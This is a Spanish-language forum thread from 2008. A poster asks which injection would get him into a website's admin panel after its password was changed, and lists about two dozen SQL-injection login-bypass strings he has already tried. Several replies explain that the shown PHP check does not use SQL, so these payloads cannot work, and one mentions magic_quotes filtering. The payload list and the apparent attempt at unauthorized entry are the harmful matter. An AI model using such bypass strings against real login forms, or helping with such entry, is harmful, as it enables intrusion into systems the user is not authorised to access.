Inyeccion Login en PHP

Iniciado por gnesisxxi, 25 Noviembre 2008, 17:21 PM

0 Miembros y 1 Visitante están viendo este tema.

gnesisxxi

Señores, estuve mirando y probando pero todavia no pude dar.
Este es el codigo de la pagina:

$idEditor=admin;

if ($idEditor != '' AND $masterPwd == 'passworddesconocido') {

Es el login al panel administrador de un site:
Conozco el codigo porque tenia un backup, pero cambiaron el password.

Que inyeccion creerian que puede servir para este caso???

Ya he probado estos:
admin'--

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

Si alguin se anima.

Saludos.

Azielito

podrias poner todo el codigo del SQL y del PHP? es que no entiendo esa linea que has puesto, pero al parecer no puedes hacer SQLinjection por no usa SQL para hacer login xD

perverthso

en primero lugar creo deberias averiguar si puedes hacer todo eso osea si tiene alguna directiva de filtrado activado como el magic_quotes activado porq si es asi anda de loq estas ponendo sirve ×× luego ya ve q codigo puedes injectarle no lo hagas asi analiza el codigo bueno saludos

s E t H

eso que pusiste hace la comparacion directamente en php, como no usa sql no se puede hacer sql injection

sirdarckcat

Cita de: gnesisxxi en 25 Noviembre 2008, 17:21 PMQue inyeccion creerian que puede servir para este caso???
->
Cita de: s E t H en 28 Noviembre 2008, 18:46 PM
eso que pusiste hace la comparacion directamente en php, como no usa sql no se puede hacer sql injection
++

:xD jajaja